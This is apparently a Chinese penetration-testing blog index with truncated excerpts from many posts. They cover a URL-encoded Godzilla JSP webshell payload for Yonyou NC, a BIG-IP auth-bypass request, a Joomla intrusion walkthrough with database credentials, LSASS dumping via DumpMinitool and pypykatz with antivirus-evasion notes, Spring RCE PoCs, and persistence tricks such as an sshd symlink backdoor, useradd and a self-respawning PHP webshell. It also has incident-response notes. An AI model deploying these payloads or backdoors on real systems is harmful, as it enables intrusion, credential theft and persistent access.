Hyyrent blog

平常遇到用友nc rce可以通过exec进行命令执行，但在不出网的场景下则需要其他方法 首先生成一个哥斯拉的jsp木马，然后进行unicode编码 再把输出结果进行url编码 最后发送数据包如下 1234String keyWord = URLDecoder.decode("%3c%25%21%5c%75%30%30%32%30%5c%75%30%30%35%33%5c%75%30%30%37%34%5c%75%30%30%37%32%5c%75%30%30%36%39%5c%75%30%30%36%65%5c%75%30%30%36%37%5c%75%30%30%32%30%5c%75%30%30%37%38%5c%75%30%30%36%33%5c%75%30%30%33%64%5c%75%30%30%32%32%5c%75%30%30%33%33%5c%75%30%30%36%33%5c%75%30%30%33%36%5c%75%30%30%36%35%5c%75%30%30%33%30%5c%75%30%30%36%32%5c%75%30%30%33%38%5c ...

漏洞原理hop-by-hop 逐跳，当在请求中遇到这些header头，逐跳会进行处理不让其转发至下一跳，比如Connection: close，abc在传输过程中，会把abc会从原始请求中删除，可以利用此特性进行SSRF、绕过鉴权等操作，本次漏洞成因就是Connection: Keep-alive，X-F5-Auth-Token，BIG-IP的鉴权过程发生在frontend，在后续转发到Jetty时会将此header删除，从而绕过鉴权 1234POST /xxx HTTP/1.1Host: Connection: close，abcabc： 处理后变成 123POST /xxx HTTP/1.1Host: Connection: close 影响版本123456- BIG-IP versions 16.1.0 to 16.1.2 (Patch released)- BIG-IP versions 15.1.0 to 15.1.5 (Patch released)- BIG-IP versions 14.1.0 to 14.1.4 (Patch released)- BIG-IP v ...

访问网站主页，是一个博客网站 常规的目录扫描 这里发现一个疑似后台地址，访问http://192.168.2.252/administrator/ 为 joomla 站点，印象中记得有rce的漏洞，上网寻找相关脚本进行利用 正当我以为一键getshell后，发现并没有利用成功 继续寻找其他利用点，这里通过 configuration.php~找到一个数据库的文件 1mysql数据库 testuser/cvcvgjASD!@ 使用navicat进行连接，可看到这里的密码为bcrypt加密，这个是不可逆的，一般是通过重新生成hash进行替换 重新生成一个hash发现还是登陆不上 这时候去阅读joomla的官方文档，寻找重置密码的方式 1secret = d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199 这里把密码重置为secret，重置后可以成功登录 找到 template 模块进行 webshell 文件上传 哥斯拉成功连接 连接之后发现很多命令执行不了 这里使用哥斯拉自带的 ...

DumpMinitool.exe经测试，360和卡巴拦截，火绒正常 Visual Studio 2022 的一个程序，使用这个需要安装扩展开发 1C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions\DumpMinitool.exe 使用命令 12345DumpMinitool.exe --file c:\users\public\test.txt --processId PID --dumpType Full# 读取pip install pypykatzpypykatz lsa minidump 111.txt 360拦截 卡巴斯基拦截 火绒不拦截 dump64.exe卡巴斯基拦截，火绒和360不拦截 360不拦截 火绒不拦截

特征确认1、cpu占用率较高 2、netstat -ano 查看有大量的对外1433不明连接 3、输入fltmc发现存在dump_xx过滤器，为紫狐木马病毒特征（管理员权限） 处置方式使用everything检索ms*.dll筛选出恶意dll 到相应的目录下无法直接查看 通过注册表找到恶意键值进行删除 删除后进行重启，重启后到C:\Windows\System32目录下可发现恶意的dll文件 恢复确认cmd输入fltmc查看恢复正常 Cpu占用率变低 没有了恶意外连

仅作为漏洞复现进行学习，切勿对网站进行非法测试，由于漏洞存在较大危害性，截图均进行打码操作 漏洞描述Spring core是Spring系列产品中用来负责发现、创建并处理bean之间的关系的一个工具包，是一个包含Spring框架基本的核心工具包 本次漏洞在Spring框架的JDK9版本（及以上版本）中，远程攻击者可在满足特定条件的基础上，通过框架的参数绑定功能获取AccessLogValve对象并诸如恶意字段值，从而触发pipeline机制并写入任意路径下的文件。 所需条件 1、使用JDK9及以上版本的Spring MVC框架 2、Spring 框架以及衍生的框架spring-beans-*.jar 文件或者存在CachedIntrospectionResults.class 环境搭建1、拉取docker快速搭建 123docker pull vulfocus/spring-core-rce-2022-03-29docker run -d -p 18001:8080 vulfocus/spring-core-rce-2022-03-29sudo service docker resta ...

漏洞描述Spring Cloud Function 是基于Spring Boot 的函数计算框架（FaaS），当其启用动态路由functionRouter时， HTTP请求头 spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞，攻击者可通过该漏洞进行远程命令执行 影响版本3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2 漏洞复现编译好的项目 https://github.com/Pizz33/Spring-Cloud-Function-SpEL 使用idea新增一个spring lnitializr项目，选择与环境匹配的java版本 添加spring web和function 右侧栏选择maven-package编译jar包 编译完成后运行jar包 1java -jar demo-0.0.1-SNAPSHOT.jar 访问127.0.0.1:8080出现下图说明搭建成功 发送poc，成功执行命令 1234567POST /functi ...

文件上锁123chattr +i webshell.phplsattr webshell.phpchattr -i webshell.php ssh软链接12ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555;useradd test -p test 不死马访问该php文件，会生成一个木马文件用于连接 123456789101112131415161718<?php ignore_user_abort(); set_time_limit(0); $interval = 5; do { $filename = 'test.php'; if(file_exists($filename)) { echo "xxx"; } else { $file = fopen("test.php", "w"); $txt = "<?php phpinfo();?>\ ...

前言1、做渗透由始至终，忌讳穿插其他项目进行 2、按顺序细心测试每一个功能点，保证漏洞无遗漏 3、山穷水复疑无路，柳暗花明又一村，一个点利用不到，可以灵活变通尝试其他方向 漏扫工具AWVS Xray 端口扫描端口扫描可发现系统开放的端口 21、22、3306等远程端口，可使用超级弱口令工具或者railgun自带模块进行暴力破解 6379端口可以尝试redis未授权，使用计划任务等方式弹shell 8080端口可尝试tomcat弱口令部署war包getshell 目录扫描通过目录扫描可以发现系统中存在的脆弱性问题，方便我们进行下一步渗透 对于一些403的页面，可以进行二级目录扫描 dirsearch Jsfinder 识别系统使用框架可通过指纹工具识别出所使用的框架或者产品 Wappalyzer tidefinger CMS二次开发站点通过目录扫描发现带有cms标识残留页面或者通过图标判断出 通过漏洞库查找相关未修复的漏洞 struts2一般使用struts2框架后缀带do或action，可以尝试进行利用 后缀为action，可能使用了struts2框架， ...

应急响应通用方法查看日志通过cmd输入eventvwr.msc打开事件查看器 在%SystemRoot%\System32\Winevt\Logs\位置存放着日志文件 常见的事件ID安全日志security.evtx 123456784624 -成功登录4625 -失败登录4647 -成功注销4720 -创建⽤户4722 -启⽤账户4724 -重置密码4732 -添加⽤户到组4738 -修改账户 远程登录日志 Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtxMicrosoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx 12345• 1149：⽤户认证成功• 21：远程桌⾯服务：会话登录成功• 22：远程桌⾯服务: 已收到 Shell 启动通知• 24：远程桌⾯服务：会话已断开连接• 25：远程桌⾯服务：会话重新连接成功 连接其他机器日志 Microsoft-Windows-Termina ...